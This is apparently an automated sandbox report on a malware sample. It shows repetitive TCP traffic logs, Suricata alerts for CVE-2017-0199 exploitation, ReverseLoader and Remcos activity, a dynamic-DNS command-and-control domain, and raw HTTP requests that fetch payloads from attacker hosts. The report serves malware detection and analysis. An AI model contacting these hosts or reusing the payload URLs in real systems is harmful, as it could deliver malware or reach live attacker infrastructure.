                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49175 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 192.3.101.149:6946
                    Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49178 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 192.3.220.29:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 192.3.220.29:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 192.3.220.29:80 -> 192.168.2.22:49175
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 192.3.220.29:80 -> 192.168.2.22:49175
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.220.29:80 -> 192.168.2.22:49175
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.220.29:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.220.29:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.220.29:80 -> 192.168.2.22:49175
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.22:49168
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.22:49174
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: banaya.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: banaya.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 192.3.220.29 192.3.220.29
                    Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
                    Source: Joe Sandbox ViewIP Address: 198.244.140.41 198.244.140.41
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49173 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49177 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
